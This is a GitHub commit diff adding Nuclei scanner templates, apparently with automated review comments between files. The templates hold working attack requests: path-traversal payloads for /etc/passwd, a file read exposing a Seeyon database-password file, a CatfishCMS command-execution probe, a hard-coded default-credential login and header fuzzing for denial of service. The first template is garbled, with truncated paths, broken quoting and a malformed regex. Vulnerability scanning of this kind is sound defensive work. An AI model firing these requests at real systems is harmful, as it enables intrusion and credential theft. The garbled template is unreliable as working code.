first commit
ping-0day committed Mar 1, 2022
0 parents commit b233279
Showing 4,383 changed files with 151,295 additions and 0 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
Binary file added .DS_Store
Binary file not shown.
110 changes: 110 additions & 0 deletions 2.yaml
@@ -0,0 +1,110 @@
id: Etc-file



info:
name: Etc File Read
author: Saimon
severity: high
description: Finds etc password files




requests:
- method: GET

path:
- |
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f..%2f/etc/passwd"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e//etc/passwd"
- "{{BaseURL}}e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}2f/etc/passwd"
- "{{BaseURL}}2f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f..%252f/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd"
- "{{BaseURL}}e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}5c/etc/passwd"
- "{{BaseURL}}5c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c..%255c/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e\/etc/passwd"
- "{{BaseURL}}e\%2e%2e\/etc/passwd"
matcher-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*] :0:0"
- "\\[(font|extension|file)s\\]"

part: body
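Review bot: The key `matcher-condition: and` is misspelled; the other templates in this commit write `matchers-condition`. With the unrecognised key the status and regex matchers are presumably OR-ed, so any 200 response would be reported as a high-severity file read. The first regex, `root:[x*] :0:0`, contains a space that never occurs in a passwd entry, so a genuine disclosure would not be confirmed by it; `root:.*:0:0:` is the usual form. The `path` list is also not parseable as shown: it opens with `- |` and has entries with unbalanced quotes (`"{{BaseURL}}""` followed by a lone `- "`), so the file should pass template validation before anyone relies on its results.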
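--- a/74cms-workflow.yaml
+++ b/74cms-workflow.yaml
@@ -0,0 +1,13 @@
+id: 74cms-workflow
+
+info:
+name: 74cms Security Checks
+author: daffainfo
+description: A simple workflow that runs all 74cms related nuclei templates on a given target.
+
+workflows:
+- template: technologies/fingerprinthub-web-fingerprints.yaml
+matchers:
+- name: 74cms
+subtemplates:
+- tags: 74cms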
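--- a/Actuator.yaml
+++ b/Actuator.yaml
@@ -0,0 +1,34 @@
+id: Finds actuator
+info:
+name: Actuator info leakage
+author: Clark
+severity: meduim
+#Look in for exposed info.
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/actuator"
+- "{{BaseURL}}/actuator/caches"
+- "{{BaseURL}}/actuator/configprops"
+- "{{BaseURL}}/actuator/conditions"
+- "{{BaseURL}}/actuator/env"
+- "{{BaseURL}}/actuator/beans"
+- "{{BaseURL}}/actuator/info"
+- "{{BaseURL}}/actuator/scheduledtasks"
+- "{{BaseURL}}/actuator/features"
+- "{{BaseURL}}/actuator/refresh"
+- "{{BaseURL}}/actuator/metrics"
+- "{{BaseURL}}/actuator/loggers"
+- "{{BaseURL}}/actuator/mappings"
+- "{{BaseURL}}/actuator/threaddump"
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- actuator
+condition: and
+
+- type: status
+status:
+- 200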
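Review bot: `severity: meduim` is a typo for `medium`, and `id: Finds actuator` contains a space, which template ids do not normally allow; either one is likely to fail validation or break severity filtering. The only content check is the single word `actuator`, so any 200 page that merely mentions the word is reported; matching on the JSON `_links` structure of the actuator index would cut false positives. Responses from `/actuator/env` and `/actuator/threaddump` can contain secrets, so the `#Look in for exposed info.` comment would serve better as an `info.description` stating that stored scan output must be treated as sensitive.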
32 changes: 32 additions & 0 deletions Application_level_dos.yaml
@@ -0,0 +1,32 @@
id: Application-dos

info:
name: Application_level_dos
author: MR.iambatman
severity: critical
description: application_dos

requests:

- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
§header§: ab72a99f16a2ff1249c98ccbd2916fa8
payloads:
header: helpers/payloads/request-headers.txt

attack: clusterbomb
redirects: true

matchers:
- type: status
status:
- 500
- 503
- 502
- 504
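Review bot: A single 502/503/504 from a proxy or a transient upstream fault is reported here as a `critical` denial of service, because the matcher accepts any listed 5xx status with no baseline request and no repeat to confirm it. The template also carries no `tags`, so it would run in default scans even though it fuzzes request headers from `helpers/payloads/request-headers.txt`; adding `tags: dos,fuzz` lets operators exclude it from runs against production systems. `attack: clusterbomb` adds nothing with a single payload set, and `description: application_dos` should say what condition is tested and what a finding means.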

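--- a/CNNVD-200705-315.yaml
+++ b/CNNVD-200705-315.yaml
@@ -0,0 +1,25 @@
+id: cnnvd-200705-315
+info:
+name: Caucho Resin Information Disclosure
+author: princechaddha
+severity: high
+reference: |
+- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
+tags: resin,caucho,lfr
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/%20../web-inf/"
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "/ ../web-inf/"
+- "Directory of /"
+condition: and
+part: body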
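--- a/CNVD-2019-01348.yaml
+++ b/CNVD-2019-01348.yaml
@@ -0,0 +1,29 @@
+id: CNVD-2019-01348
+
+info:
+name: Xiuno BBS CNVD-2019-01348
+author: princechaddha
+severity: medium
+description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
+reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
+tags: xiuno,cnvd,cnvd2019
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/install/"
+headers:
+Accept-Encoding: deflate
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+part: body
+words:
+- "/view/js/xiuno.js"
+- "Choose Language (选择语言)"
+condition: and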
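--- a/CNVD-2019-06255.yaml
+++ b/CNVD-2019-06255.yaml
@@ -0,0 +1,27 @@
+id: CNVD-2019-06255
+
+info:
+name: CatfishCMS RCE
+author: Lark-Lab
+severity: medium
+reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
+tags: rce,cnvd,catfishcms,cnvd2019
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- 'OS'
+- 'PATH'
+- 'SHELL'
+- 'USER'
+condition: and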
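Review bot: The word matcher relies on `OS`, `PATH`, `SHELL` and `USER`, short generic strings that occur together on many ordinary pages, and it sets no `part`, so a 200 response with unrelated content can be reported as command execution. A finding named `CatfishCMS RCE` is rated `severity: medium`, which understates the impact if the match is genuine and invites triage to skip it. The `reference` is a bare IP address over plain HTTP; an advisory link for CNVD-2019-06255 (placeholder: `<CNVD advisory URL>`) would be stable and verifiable. An `info.description` is also missing.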
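--- a/CNVD-2020-23735.yaml
+++ b/CNVD-2020-23735.yaml
@@ -0,0 +1,27 @@
+id: CNVD-2020-23735
+
+info:
+name: Xxunchi Local File read
+author: princechaddha
+severity: medium
+description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
+reference: https://www.cnvd.org.cn/flaw/show/2025171
+tags: xunchi,lfi,cnvd,cnvd2020
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+part: body
+words:
+- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
+- "display_errors"
+condition: and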
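Review bot: The metadata names the product three different ways, `name: Xxunchi Local File read`, `description: Xunyou cms ...` and `tags: xunchi`, which makes a finding hard to map to an asset inventory or an advisory; pick the vendor's spelling and use it in all three fields. The `reference` URL carries the numeric id `2025171` rather than the CNVD-2020-23735 identifier used as the template id, so a reader cannot confirm from the file that both describe the same flaw. The request embeds a fixed `password=` value that the matcher then expects back in the body; a short comment on where that value originates would let reviewers judge the false-positive risk.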
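--- a/CNVD-2020-56167.yaml
+++ b/CNVD-2020-56167.yaml
@@ -0,0 +1,30 @@
+id: CNVD-2020-56167
+
+info:
+name: Ruijie Smartweb Default Password
+author: pikpikcu
+severity: low
+reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
+tags: ruijie,default-login,cnvd
+
+requests:
+- method: POST
+path:
+- "{{BaseURL}}/WEB_VMS/LEVEL15/"
+headers:
+Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
+
+matchers-condition: and
+matchers:
+
+- type: word
+words:
+- "Level was: LEVEL15"
+- "/WEB_VMS/LEVEL15/"
+part: body
+condition: and
+
+- type: status
+status:
+- 200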
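Review bot: This check authenticates with a fixed `Authorization: Basic` credential and POSTs a device command, yet `info` has no `description` saying so, which operators need to know before running it against equipment they manage. `severity: low` also sits oddly with a match on `Level was: LEVEL15`, which suggests the default account reaches a privileged level; the rating should be justified in the description or raised. A suitable description would be `Detects Ruijie Smartweb devices that still accept the vendor default guest account; the check logs in and issues a single show command.`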
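--- a/CNVD-2020-62422.yaml
+++ b/CNVD-2020-62422.yaml
@@ -0,0 +1,29 @@
+id: CNVD-2020-62422
+
+info:
+name: Seeyon readfile(CNVD-2020-62422)
+author: pikpikcu
+severity: medium
+reference: https://blog.csdn.net/m0_46257936/article/details/113150699
+tags: lfi,cnvd
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+- type: word
+words:
+- "application/x-msdownload"
+condition: and
+part: header
+- type: word
+words:
+- "ctpDataSource.password"
+condition: and
+part: body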
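Review bot: A successful match means the response body contains `ctpDataSource.password`, that is, the target's datasource properties file, yet `info` has no `description` and nothing warns that stored scan responses will then hold database credentials. Add a description that states the impact and says results must be handled as secrets, with any exposed credential rotated once confirmed. `severity: medium` looks low for a disclosure of database credentials. `condition: and` on the two single-word matchers is redundant and can be dropped.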